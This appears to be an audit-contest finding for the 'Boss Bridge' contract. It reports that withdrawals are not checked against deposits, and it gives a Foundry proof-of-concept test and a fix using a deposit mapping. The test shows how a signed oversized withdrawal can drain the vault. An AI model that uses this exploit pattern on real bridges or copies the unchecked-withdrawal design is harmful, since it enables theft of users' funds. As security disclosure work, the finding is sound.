First Flight #4: Boss Bridge
First Flight #4
Beginner FriendlyFoundryBridge
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

User can withdraw amount more than deposited

0xfuluz

Summary

User can withdraw amount more than amount actual deposited

Vulnerability Details

The protocol lacks a validation mechanism for the deposited amount by the user. Consequently, if a user can trick the signer (or malicious signer) into signing a withdrawal message with arbitrary amount, they can exploit this vulnerability to withdraw an amount exceeding their actual deposit.
Testing code for POC:

function testUserCanWithdrawMoreThanDeposited() public {
// transfer extra amount to vault
vm.prank(deployer);
token.transfer(address(vault), 10e19);
// deposit money - 10e18
vm.startPrank(user);
uint256 depositAmount = 10e18;
token.approve(address(tokenBridge), depositAmount);
tokenBridge.depositTokensToL2(user, userInL2, depositAmount);
console2.log(token.balanceOf(address(user)));
// assum user can trick to get signature for request withdraw 2 * deposited amount
(uint8 v, bytes32 r, bytes32 s) = _signMessage(
_getTokenWithdrawalMessage(user, depositAmount * 2),
operator.key
);
// withdraw 2* deposited amount
tokenBridge.withdrawTokensToL1(user, (depositAmount * 2), v, r, s);
console2.log(token.balanceOf(address(user)));
vm.stopPrank();
}

Impact

User can drain vault of bridge

Tools Used

Foundry & manual testing

Recommendations

Implement mapping to keep track amount deposited by user, ex: mapping (address => uint256) amountDeposited . Then restrict amount withdraw <= deposited

Updates

Lead Judging Commences

0xnevi Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

withdrawTokensToL1(): No check for deposits amount

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.